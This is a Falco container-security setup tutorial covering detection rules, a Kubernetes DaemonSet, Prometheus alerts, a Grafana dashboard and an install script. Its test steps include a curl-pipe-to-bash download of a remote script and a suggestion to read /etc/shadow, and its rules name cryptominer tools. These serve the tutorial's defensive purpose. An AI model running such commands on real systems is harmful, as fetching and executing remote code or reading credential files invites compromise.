Set up Falco for real-time container security monitoring with runtime threat detection, Kubernetes integration, and automated alerting through Grafana dashboards.
Prerequisites
- Docker or Podman container runtime
- Kubernetes cluster (optional)
- Prometheus and Grafana (for monitoring)
- Root or sudo access
What this solves
Falco provides real-time runtime security monitoring for containers and Kubernetes environments by detecting malicious activities, policy violations, and security threats. This tutorial shows you how to deploy Falco for comprehensive container security monitoring with custom rules, Kubernetes integration, and alerting capabilities through Grafana dashboards.
Step-by-step installation
Update system packages
Start by updating your package manager to ensure you have the latest security updates.
sudo apt update && sudo apt upgrade -y
sudo apt install -y curl gnupg lsb-releaseAdd Falco repository and install
Add the official Falco repository and install the Falco runtime security engine with kernel module support.
curl -fsSL https://falco.org/repo/falcosecurity-packages.asc | sudo gpg --dearmor -o /usr/share/keyrings/falco-archive-keyring.gpg
echo "deb [signed-by=/usr/share/keyrings/falco-archive-keyring.gpg] https://download.falco.org/packages/deb stable main" | sudo tee -a /etc/apt/sources.list.d/falcosecurity.list
sudo apt update
sudo apt install -y falcoConfigure Falco main settings
Configure Falco's main configuration file with optimized settings for container monitoring and JSON output for integration with monitoring systems.
rules_file:
- /etc/falco/falco_rules.yaml
- /etc/falco/falco_rules.local.yaml
- /etc/falco/k8s_audit_rules.yaml
- /etc/falco/rules.d
time_format_iso_8601: true
json_output: true
json_include_output_property: true
json_include_tags_property: true
log_stderr: true
log_syslog: false
log_level: info
priority: debug
buffered_outputs: true
outputs:
rate: 1
max_burst: 1000
syslog_output:
enabled: true
file_output:
enabled: true
keep_alive: false
filename: /var/log/falco/events.log
stdout_output:
enabled: true
webserver:
enabled: true
listen_port: 8765
k8s_healthz_endpoint: /healthz
ssl_enabled: false
ssl_certificate: /etc/falco/falco.pem
grpc:
enabled: true
bind_address: "0.0.0.0:5060"
threadiness: 8
grpc_output:
enabled: trueCreate custom security rules
Define custom Falco rules for container-specific threats, suspicious activities, and compliance violations.
- rule: Unauthorized Container Privilege Escalation
desc: Detect attempts to escalate privileges in containers
condition: >
spawned_process and container and
((proc.name in (sudo, su, setuid, setgid)) or
(proc.args contains "--privileged") or
(proc.args contains "--cap-add"))
output: >
Privilege escalation attempt in container (user=%user.name command=%proc.cmdline
container_id=%container.id container_name=%container.name image=%container.image.repository)
priority: CRITICAL
tags: [container, privilege_escalation, security]
- rule: Suspicious Network Activity in Container
desc: Detect unusual network connections from containers
condition: >
inbound_outbound and container and
((fd.sport in (22, 23, 3389, 5900)) or
(fd.dport in (22, 23, 3389, 5900)) or
(fd.net contains "0.0.0.0"))
output: >
Suspicious network activity (user=%user.name command=%proc.cmdline connection=%fd.name
container_id=%container.id container_name=%container.name image=%container.image.repository)
priority: WARNING
tags: [container, network, security]
- rule: Container File System Tampering
desc: Detect unauthorized file system modifications in containers
condition: >
open_write and container and
(fd.name startswith "/etc/" or
fd.name startswith "/bin/" or
fd.name startswith "/sbin/" or
fd.name startswith "/usr/bin/" or
fd.name startswith "/usr/sbin/")
output: >
File system tampering detected (user=%user.name file=%fd.name command=%proc.cmdline
container_id=%container.id container_name=%container.name image=%container.image.repository)
priority: ERROR
tags: [container, filesystem, security]
- rule: Cryptocurrency Mining Activity
desc: Detect potential cryptocurrency mining in containers
condition: >
spawned_process and container and
(proc.name in (xmrig, cpuminer, cgminer, bfgminer, ethminer) or
proc.cmdline contains "stratum+tcp" or
proc.cmdline contains "cryptonight" or
proc.cmdline contains "scrypt")
output: >
Cryptocurrency mining detected (user=%user.name command=%proc.cmdline
container_id=%container.id container_name=%container.name image=%container.image.repository)
priority: CRITICAL
tags: [container, mining, security]
- rule: Container Shell Access
desc: Monitor shell access to containers for security auditing
condition: >
spawned_process and container and
(proc.name in (bash, sh, zsh, fish, csh, tcsh) and
proc.pname in (kubectl, docker, podman, crictl))
output: >
Shell access to container (user=%user.name shell=%proc.name command=%proc.cmdline
container_id=%container.id container_name=%container.name image=%container.image.repository)
priority: INFO
tags: [container, shell, audit]Configure log rotation
Set up log rotation for Falco events to prevent disk space issues and maintain historical security data.
sudo mkdir -p /var/log/falco
sudo touch /var/log/falco/events.log
sudo chown syslog:adm /var/log/falco/events.log
sudo chmod 640 /var/log/falco/events.log/var/log/falco/*.log {
daily
rotate 30
compress
delaycompress
missingok
notifempty
create 640 syslog adm
postrotate
systemctl reload falco
endscript
}Enable and start Falco service
Enable Falco to start automatically on boot and start the service for immediate protection.
sudo systemctl enable falco
sudo systemctl start falco
sudo systemctl status falcoInstall Falco Kubernetes integration
Deploy Falco as a DaemonSet in Kubernetes for cluster-wide container security monitoring.
kubectl create namespace falco
kubectl apply -f https://raw.githubusercontent.com/falcosecurity/charts/master/falco/values.yamlapiVersion: apps/v1
kind: DaemonSet
metadata:
name: falco
namespace: falco
labels:
app.kubernetes.io/name: falco
spec:
selector:
matchLabels:
app.kubernetes.io/name: falco
template:
metadata:
labels:
app.kubernetes.io/name: falco
spec:
serviceAccountName: falco
hostNetwork: true
hostPID: true
containers:
- name: falco
image: falcosecurity/falco-no-driver:latest
args:
- /usr/bin/falco
- --cri=/run/containerd/containerd.sock
- --cri=/var/run/docker.sock
- -K=/var/run/secrets/kubernetes.io/serviceaccount/token
- -k=https://kubernetes.default
- --k8s-node-name=$(FALCO_K8S_NODE_NAME)
env:
- name: FALCO_K8S_NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
securityContext:
privileged: true
volumeMounts:
- mountPath: /host/var/run/docker.sock
name: docker-socket
- mountPath: /host/run/containerd/containerd.sock
name: containerd-socket
- mountPath: /host/dev
name: dev-fs
- mountPath: /host/proc
name: proc-fs
readOnly: true
- mountPath: /host/boot
name: boot-fs
readOnly: true
- mountPath: /host/lib/modules
name: lib-modules
readOnly: true
- mountPath: /host/usr
name: usr-fs
readOnly: true
- mountPath: /host/etc/os-release
name: etc-os-release
readOnly: true
- mountPath: /etc/falco
name: falco-config
volumes:
- name: docker-socket
hostPath:
path: /var/run/docker.sock
- name: containerd-socket
hostPath:
path: /run/containerd/containerd.sock
- name: dev-fs
hostPath:
path: /dev
- name: proc-fs
hostPath:
path: /proc
- name: boot-fs
hostPath:
path: /boot
- name: lib-modules
hostPath:
path: /lib/modules
- name: usr-fs
hostPath:
path: /usr
- name: etc-os-release
hostPath:
path: /etc/os-release
- name: falco-config
configMap:
name: falco-config
tolerations:
- operator: Exists
effect: NoSchedulekubectl apply -f falco-daemonset.yamlConfigure Falco exporter for Prometheus
Install and configure Falco exporter to send security metrics to Prometheus for monitoring and alerting.
wget https://github.com/falcosecurity/falco-exporter/releases/download/v0.8.7/falco-exporter_0.8.7_linux_amd64.tar.gz
tar -xzf falco-exporter_0.8.7_linux_amd64.tar.gz
sudo mv falco-exporter /usr/local/bin/
sudo chmod +x /usr/local/bin/falco-exporter[Unit]
Description=Falco Prometheus Exporter
After=network.target falco.service
Requires=falco.service
[Service]
Type=simple
User=nobody
Group=nogroup
ExecStart=/usr/local/bin/falco-exporter \
--client-socket=unix:///var/run/falco/falco.sock \
--listen-address=0.0.0.0:9376 \
--metrics-interval=15s
Restart=on-failure
RestartSec=5
[Install]
WantedBy=multi-user.targetsudo systemctl daemon-reload
sudo systemctl enable falco-exporter
sudo systemctl start falco-exporterConfigure Grafana dashboard
Import and configure a Grafana dashboard for visualizing Falco security events and metrics.
{
"dashboard": {
"id": null,
"title": "Falco Security Monitoring",
"description": "Container runtime security monitoring with Falco",
"tags": ["falco", "security", "containers"],
"timezone": "",
"panels": [
{
"id": 1,
"title": "Security Events by Priority",
"type": "stat",
"targets": [
{
"expr": "increase(falco_events_total[5m])",
"legendFormat": "{{priority}}"
}
],
"fieldConfig": {
"defaults": {
"color": {
"mode": "thresholds"
},
"thresholds": {
"steps": [
{"color": "green", "value": null},
{"color": "yellow", "value": 5},
{"color": "red", "value": 10}
]
}
}
},
"gridPos": {"h": 8, "w": 12, "x": 0, "y": 0}
},
{
"id": 2,
"title": "Critical Security Events",
"type": "table",
"targets": [
{
"expr": "falco_events_total{priority=\"Critical\"}",
"format": "table",
"instant": true
}
],
"gridPos": {"h": 8, "w": 12, "x": 12, "y": 0}
},
{
"id": 3,
"title": "Events Timeline",
"type": "timeseries",
"targets": [
{
"expr": "rate(falco_events_total[5m])",
"legendFormat": "Events per second"
}
],
"gridPos": {"h": 8, "w": 24, "x": 0, "y": 8}
}
],
"time": {
"from": "now-1h",
"to": "now"
},
"refresh": "30s"
}
}Set up alerting rules
Configure Prometheus alerting rules for critical Falco security events that require immediate attention.
groups:
- name: falco-security
rules:
- alert: FalcoCriticalSecurityEvent
expr: increase(falco_events_total{priority="Critical"}[5m]) > 0
for: 0m
labels:
severity: critical
annotations:
summary: "Critical security event detected by Falco"
description: "Falco detected {{ $value }} critical security events in the last 5 minutes"
- alert: FalcoPrivilegeEscalation
expr: increase(falco_events_total{rule="Unauthorized Container Privilege Escalation"}[10m]) > 0
for: 0m
labels:
severity: critical
annotations:
summary: "Container privilege escalation detected"
description: "Privilege escalation attempt detected in container environment"
- alert: FalcoSuspiciousNetworkActivity
expr: increase(falco_events_total{rule="Suspicious Network Activity in Container"}[15m]) > 5
for: 5m
labels:
severity: warning
annotations:
summary: "Multiple suspicious network connections detected"
description: "{{ $value }} suspicious network activities detected in containers"
- alert: FalcoCryptocurrencyMining
expr: increase(falco_events_total{rule="Cryptocurrency Mining Activity"}[5m]) > 0
for: 0m
labels:
severity: critical
annotations:
summary: "Cryptocurrency mining activity detected"
description: "Potential cryptocurrency mining detected in container environment"
- alert: FalcoFileSystemTampering
expr: increase(falco_events_total{rule="Container File System Tampering"}[10m]) > 3
for: 2m
labels:
severity: warning
annotations:
summary: "File system tampering detected"
description: "{{ $value }} file system modifications detected in containers"Verify your setup
Test your Falco installation by checking service status, generating test events, and verifying monitoring integration.
# Check Falco service status
sudo systemctl status falco
Verify Falco is detecting events
sudo tail -f /var/log/falco/events.log
Test with a suspicious command (will trigger alerts)
sudo docker run --rm -it ubuntu:latest bash -c "curl -s https://example.com/suspicious-script.sh | bash"
Check Falco exporter metrics
curl -s http://localhost:9376/metrics | grep falco_events
Verify Kubernetes integration
kubectl get pods -n falco
kubectl logs -n falco -l app.kubernetes.io/name=falco
Test Grafana dashboard
Navigate to Grafana and import the dashboard JSON
Common issues
| Symptom | Cause | Fix |
|---|---|---|
| Falco service fails to start | Kernel headers missing | sudo apt install linux-headers-$(uname -r) then restart |
| No events in logs | JSON output misconfigured | Check /etc/falco/falco.yaml json_output: true |
| High CPU usage | Too many events | Adjust rule priorities and add exceptions in rules |
| Kubernetes pods not monitored | Wrong socket paths | Verify container runtime socket mounts in DaemonSet |
| Metrics not appearing in Prometheus | Exporter connection failed | Check /var/run/falco/falco.sock exists and permissions |
| False positive alerts | Rules too broad | Refine rule conditions and add application-specific exceptions |
Next steps
- Configure intrusion detection with OSSEC and Wazuh for host-level security monitoring
- Implement Grafana alerting with Prometheus and InfluxDB for comprehensive monitoring
- Configure Falco custom rules for application security
- Integrate Falco with ELK Stack for centralized logging
- Implement Falco Sidekick for multi-destination alerting
Automated install script
Run this to automate the entire setup
install.sh
#!/usr/bin/env bash
set -euo pipefail
# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color
# Configuration
FALCO_CONFIG_DIR="/etc/falco"
FALCO_SERVICE="falco"
# Cleanup function for rollback
cleanup() {
echo -e "${RED}[ERROR] Installation failed. Cleaning up...${NC}"
systemctl stop falco 2>/dev/null || true
if [ "$PKG_MGR" = "apt" ]; then
apt remove -y falco 2>/dev/null || true
rm -f /etc/apt/sources.list.d/falcosecurity.list
rm -f /usr/share/keyrings/falco-archive-keyring.gpg
else
$PKG_INSTALL remove -y falco 2>/dev/null || true
rm -f /etc/yum.repos.d/falcosecurity.repo
fi
exit 1
}
# Set up error handling
trap cleanup ERR
# Usage message
usage() {
echo "Usage: $0 [OPTIONS]"
echo "Options:"
echo " --help Show this help message"
echo " --enable-json Enable JSON output for alerts"
echo " --log-level Set log level (emergency,alert,critical,error,warning,notice,info,debug)"
echo ""
echo "Example: $0 --enable-json --log-level warning"
exit 1
}
# Parse arguments
ENABLE_JSON=false
LOG_LEVEL="info"
while [[ $# -gt 0 ]]; do
case $1 in
--help)
usage
;;
--enable-json)
ENABLE_JSON=true
shift
;;
--log-level)
LOG_LEVEL="$2"
shift 2
;;
*)
echo -e "${RED}Unknown option: $1${NC}"
usage
;;
esac
done
# Check if running as root or with sudo
if [[ $EUID -ne 0 ]]; then
echo -e "${RED}This script must be run as root or with sudo${NC}"
exit 1
fi
echo -e "${GREEN}Falco Runtime Security Installation Script${NC}"
echo "========================================="
# Detect distribution
echo -e "${YELLOW}[1/8] Detecting operating system...${NC}"
if [ -f /etc/os-release ]; then
. /etc/os-release
case "$ID" in
ubuntu|debian)
PKG_MGR="apt"
PKG_INSTALL="apt install -y"
UPDATE_CMD="apt update"
UPGRADE_CMD="apt upgrade -y"
;;
almalinux|rocky|centos|rhel|ol|fedora)
PKG_MGR="dnf"
PKG_INSTALL="dnf install -y"
UPDATE_CMD="dnf update -y"
UPGRADE_CMD=""
;;
amzn)
PKG_MGR="yum"
PKG_INSTALL="yum install -y"
UPDATE_CMD="yum update -y"
UPGRADE_CMD=""
;;
*)
echo -e "${RED}Unsupported distribution: $ID${NC}"
exit 1
;;
esac
echo -e "${GREEN}Detected: $PRETTY_NAME${NC}"
else
echo -e "${RED}Cannot detect operating system${NC}"
exit 1
fi
# Update system packages
echo -e "${YELLOW}[2/8] Updating system packages...${NC}"
$UPDATE_CMD
if [ -n "$UPGRADE_CMD" ]; then
$UPGRADE_CMD
fi
# Install prerequisites
echo -e "${YELLOW}[3/8] Installing prerequisites...${NC}"
if [ "$PKG_MGR" = "apt" ]; then
$PKG_INSTALL curl gnupg lsb-release ca-certificates
else
$PKG_INSTALL curl gnupg2 ca-certificates
fi
# Add Falco repository
echo -e "${YELLOW}[4/8] Adding Falco repository...${NC}"
if [ "$PKG_MGR" = "apt" ]; then
# Add GPG key
curl -fsSL https://falco.org/repo/falcosecurity-packages.asc | gpg --dearmor -o /usr/share/keyrings/falco-archive-keyring.gpg
chmod 644 /usr/share/keyrings/falco-archive-keyring.gpg
# Add repository
echo "deb [signed-by=/usr/share/keyrings/falco-archive-keyring.gpg] https://download.falco.org/packages/deb stable main" > /etc/apt/sources.list.d/falcosecurity.list
chmod 644 /etc/apt/sources.list.d/falcosecurity.list
# Update package list
apt update
else
# Import GPG key
curl -fsSL https://falco.org/repo/falcosecurity-packages.asc | gpg --import
# Add YUM/DNF repository
cat > /etc/yum.repos.d/falcosecurity.repo << EOF
[falcosecurity]
name=Falco repository
baseurl=https://download.falco.org/packages/rpm/
enabled=1
gpgcheck=1
gpgkey=https://falco.org/repo/falcosecurity-packages.asc
EOF
chmod 644 /etc/yum.repos.d/falcosecurity.repo
fi
# Install Falco
echo -e "${YELLOW}[5/8] Installing Falco...${NC}"
$PKG_INSTALL falco
# Configure kernel module loading
echo -e "${YELLOW}[6/8] Configuring kernel module...${NC}"
# Check if running in container/VM without kernel headers
if [ ! -d /lib/modules/$(uname -r) ]; then
echo -e "${YELLOW}Warning: Kernel headers not found. Installing kernel headers...${NC}"
if [ "$PKG_MGR" = "apt" ]; then
$PKG_INSTALL linux-headers-$(uname -r) || $PKG_INSTALL linux-headers-generic
else
$PKG_INSTALL kernel-devel-$(uname -r) || $PKG_INSTALL kernel-devel
fi
fi
# Configure Falco
echo -e "${YELLOW}[7/8] Configuring Falco...${NC}"
if [ -f "$FALCO_CONFIG_DIR/falco.yaml" ]; then
# Backup original config
cp "$FALCO_CONFIG_DIR/falco.yaml" "$FALCO_CONFIG_DIR/falco.yaml.backup"
# Configure JSON output if requested
if [ "$ENABLE_JSON" = true ]; then
sed -i 's/^json_output:.*/json_output: true/' "$FALCO_CONFIG_DIR/falco.yaml"
fi
# Configure log level
sed -i "s/^log_level:.*/log_level: $LOG_LEVEL/" "$FALCO_CONFIG_DIR/falco.yaml"
# Ensure proper file permissions
chmod 644 "$FALCO_CONFIG_DIR/falco.yaml"
chown root:root "$FALCO_CONFIG_DIR/falco.yaml"
fi
# Create custom rules directory if it doesn't exist
if [ ! -d "$FALCO_CONFIG_DIR/rules.d" ]; then
mkdir -p "$FALCO_CONFIG_DIR/rules.d"
chmod 755 "$FALCO_CONFIG_DIR/rules.d"
chown root:root "$FALCO_CONFIG_DIR/rules.d"
fi
# Enable and start Falco service
systemctl enable falco
systemctl start falco
# Configure SELinux if present
if command -v getenforce >/dev/null 2>&1 && [ "$(getenforce)" != "Disabled" ]; then
echo -e "${YELLOW}Configuring SELinux for Falco...${NC}"
setsebool -P domain_kernel_load_modules on 2>/dev/null || true
fi
# Verification
echo -e "${YELLOW}[8/8] Verifying installation...${NC}"
sleep 5
# Check service status
if systemctl is-active --quiet falco; then
echo -e "${GREEN}✓ Falco service is running${NC}"
else
echo -e "${RED}✗ Falco service failed to start${NC}"
echo "Check logs with: journalctl -u falco -f"
exit 1
fi
# Check if kernel module is loaded
if lsmod | grep -q falco; then
echo -e "${GREEN}✓ Falco kernel module loaded${NC}"
elif [ -f /sys/kernel/debug/tracing/events/syscalls/sys_enter_openat/enable ]; then
echo -e "${GREEN}✓ Falco using modern eBPF probe${NC}"
else
echo -e "${YELLOW}⚠ Falco may be using userspace instrumentation${NC}"
fi
# Check configuration
if falco --validate /etc/falco/falco.yaml >/dev/null 2>&1; then
echo -e "${GREEN}✓ Falco configuration is valid${NC}"
else
echo -e "${YELLOW}⚠ Falco configuration validation failed${NC}"
fi
# Display status and next steps
echo ""
echo -e "${GREEN}Falco Runtime Security installation completed successfully!${NC}"
echo ""
echo "Next steps:"
echo "• Monitor logs: journalctl -u falco -f"
echo "• View configuration: cat /etc/falco/falco.yaml"
echo "• Add custom rules in: /etc/falco/rules.d/"
echo "• Test detection: try suspicious activities like 'cat /etc/shadow'"
echo ""
echo "Service management:"
echo "• Status: systemctl status falco"
echo "• Restart: systemctl restart falco"
echo "• Stop: systemctl stop falco"
echo ""
if [ "$ENABLE_JSON" = true ]; then
echo -e "${GREEN}JSON output is enabled for integration with log aggregation systems${NC}"
fi
echo -e "${GREEN}Falco is now protecting your system with runtime security monitoring!${NC}"Review the script before running. Execute with: bash install.sh